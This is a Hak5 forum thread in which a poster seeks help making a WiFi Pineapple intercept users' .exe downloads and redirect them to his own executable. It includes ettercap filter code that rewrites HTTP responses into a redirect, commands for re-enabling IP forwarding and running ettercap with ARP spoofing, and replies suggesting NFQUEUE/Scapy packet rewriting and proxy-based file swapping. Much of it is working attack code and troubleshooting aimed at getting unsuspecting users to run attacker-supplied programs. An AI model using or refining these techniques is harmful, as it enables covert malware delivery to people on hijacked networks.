Jump to content

Problem with realtime EXE replacement


DarkPringles

Recommended Posts

Hi Hak5 community,

i have a few problems with implementing some feature to the Wifi Pineapple and hope anybody can help me. My goal is to run a script that replaces every requested *.exe file with a link of my own.

Scenario: A user try to download for example VLC Media Player from the official site (http://get.videolan.org/vlc/2.1.5/win32/vlc-2.1.5-win32.exe) over the Wifi Pinapple. The Pinapple intercept this request and replace it with a custom *.exe Link so that the user download and execute my custom executable.

In best case i want to implement a tiny text file that saves the ip adress of this user that got the replaced exe and if he tried to redownload his file, he will not get spoofed.

But first the replacement. I want to implement a custom ettercap filter that i found on the internet. But everytime i want to use ettercap for a unfined sniffing the internet connection of all clients connected to the pineapple abort. The only way to get ettercap working is to set the "-u" parameter. This option prevents ettercap to disable ip forwarding in the kernel. But with this parameter the usage of filters that replace data in realtime is prohibited.

So the final question is how to run ettercap with custom filters or is there any alternative solution for my problem. i hope anyone can help me =)

Best regards,

DarkPringles, from Germany

Source of the filter (i will customize that later) :

# replace rmccurdy with your website
# replace the url with what ever exe you like
if (ip.proto == TCP && tcp.dst == 80) {
if (search(DATA.data, "Accept-Encoding")) {
replace("Accept-Encoding", "Accept-Rubbish!");
# note: replacement string is same length as original string
msg("zapped Accept-Encoding!n");
}
}
if (ip.proto == TCP && tcp.src == 80) {
replace("keep-alive", "close" ");
replace("Keep-Alive", "close" ");
}
if (ip.proto == TCP && search(DATA.data, ": application") ){
# enable for logging log(DECODED.data, "/tmp/log.log");
msg("found EXEn");
# "Win32" is the first part of the exe example:
# if the EXE started with "this program must be run in MSDOS mode" you could search for MSDOS etc ..
if (search(DATA.data, "Win32")) {
msg("doing nothingn");
}
else {
replace("200 OK", "301 Moved Permanently
Location: <snip>
");
msg("redirect successn");
}
}
Link to comment
Share on other sites

We have something like this coming, specifically replacing files such as .exe on the go.

It is currently written in python, but we have noticed that when lots of clients are browsing, proxying files such as images becomes heavy for the WiFi Pineapple.

Writing the same program in C++ has given much better results, so we will see where it takes us.

Best Regards,

Sebkinne

Link to comment
Share on other sites

Wow, thanks for the quick reply. so i will wait for this cool feature. can you say why all clients gets no internet connection while ettercap runs withour the "-u" parameter ? PS: can you remove the custom link in the ettercap filter source in my post?

Kann ich leider nicht, ettercap ist etwas buggy.. Mal gucken ob wir vllt an einen neuere Version kommen.

Best Regards,

Sebkinne

Link to comment
Share on other sites

You can do something like this with Deep Packet Inspection. It is also possible to do it in Python. Add a new chain to your IP tables which directs forwarded TCP packets to NFQUEUE. You can grab the packets with a Python script and decide what to do with them (let them pass, alter them or drop them). What you could do is let the GET request pass to the server and then collect all the segments comming from the server to reassemble the HTML source code (basically sending a lot of Acks). In many cases the content of the segments is compressed so you have to puzzle all together and then decompress them. In a next step you can alter the HTML as you like (replace hyperlinks etc). Then you have to simulate the server connection to the client and transmit the altered HTML in segments back to the client (you can use Scapy for that).

Link to comment
Share on other sites

100% reliable proxy written in your choice for the basic framework that suports https aswell, then each exploit could be a plugin

If the GET request includes('*.exe') then launch the basic-plugin.rb for the swapping function that meets these if statements... mod the content length andd swap the data

Plugins could be the language of your choice, simply handle the specific request and provide a response design for that exploit

Link to comment
Share on other sites

Kann ich leider nicht, ettercap ist etwas buggy.. Mal gucken ob wir vllt an einen neuere Version kommen.

Best Regards,

Sebkinne

Just found it out. Ettercap disable IP-Forwarding in the kernel before starts sniffing. Just enabled it again ("echo 1 > /proc/sys/net/ipv4/ip_forward") after starting ettercap. After doing it clients get internet connection and you are able to manipulate the traffic with custom ettercap filters....

But manipulating the traffic with ettercap and custom filters is still not possible for me. Ettercap told me that he found a string and replaced it but without impact in the clients webbrowser -.-

source of filter:

if (ip.proto == TCP) {
if (search(DATA.data, "Software")) {
replace("Software", "Hardware");
msg("String Replaced \n");
}
}
Edited by darkpringles
Link to comment
Share on other sites

Your ettercap config may need iptables enabled... idk maybe u have already done this

Also u need to see plain text, accept-encoding rrplace wi. Azzept-encoding

Idk maybe u leedt that part out of your post

thanks for help. i forget to replace the encoding part .... -.-

my filter is now at this state but no result at the client side =(

if (ip.proto == TCP && tcp.dst == 80) {
if (search(DATA.data, "Accept-Encoding")) {
replace("Accept-Encoding", "Azzept-encoding");
msg("Enc Skippd \n");
}
}
if (ip.proto == TCP && tcp.dst == 80) {
if (search(DATA.data, "software")) {
replace("software", "hardware");
msg("Software Replaced \n");
}
}
Edited by darkpringles
Link to comment
Share on other sites

the message is: "Privileges dropped to UID 0 GID 0..." ... iptables are also enabled. i used the same configuration at my kali box with the same results...ettercap found the string but replacement is still without impact. i use non ssl sites to test it.

so it has to be a trivial error, because it not work on kali or the pineapple.

to sum up.

UID change to 0

iptables uncomment in etter.conf

the custom filter is like in the post before

command in kali: "ettercap -Tq -i wlan0 -F custom-filter"

command in pineapple: "ettercap -Tq -i br-lan -F custom-filter"

any ideas?

thanks for your time!

Link to comment
Share on other sites

http://l33ttutorials.wordpress.com/2014/02/20/tutorial-man-in-the-middle-attack-using-sslstrip-and-arpspoofing-with-kali-linux/

Read this, vm installs or hd installs of kali may cause issues i guess

Edit;

Its just ettercaps ugly ways lol one day it works another day your like wtf... this frustration is why I wrote a proxy to do the data swap. . . Im sure its a small step you are missing...

Arpspoof

Dnsspoof

And a proxy kungfoo replaces ettercap...

Ettercap -T -q -f filter -M ARP // //

Its been a few years since I used ettercap

Edit;

Edited by i8igmac
Link to comment
Share on other sites

Kann ich leider nicht, ettercap ist etwas buggy.. Mal gucken ob wir vllt an einen neuere Version kommen.

Best Regards,

Sebkinne

Ist zwar OT, aber schon ganz schön cool zu lesen, dass Sebkinne Deutsch kann! :smile:

Link to comment
Share on other sites

Wenn Ettercap Zeichenketten austauscht, korrigiert es dann auch die Paketlänge? Falls nicht kann das dazu führen, dass das Paket am anderen Ende zwecks Fehler verworfen wird. Wenn man die Pakete verändert muss man nicht nur die Länge sondern auch die Prüfsumme neu berechnen! :P

// Does Ettercap recalculate the lenght of the packet (and the checksum) ? This might be a problem because wrong packets might be dropped by the client.

Edited by whitenoise
Link to comment
Share on other sites

In my proxy, I make sure that the length is recalculated on injection.

In regards to ettercap, I genuinely do not know, I haven't got too much experience, but I would expect it does. I'll take a look at the source this weekend.

I am expecting to launch my proxy by the end of the month / start of next month.

Best,

Sebkinne

Link to comment
Share on other sites

From my experience, I remember swapping data with ettercap, if the string size was larger then the original then the clients browser wwould not always provide the correct amount of data, for example the page source may be missing at the end </HTML>

replace(12345, 1234567)

Page may be missing L>

</HTM

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...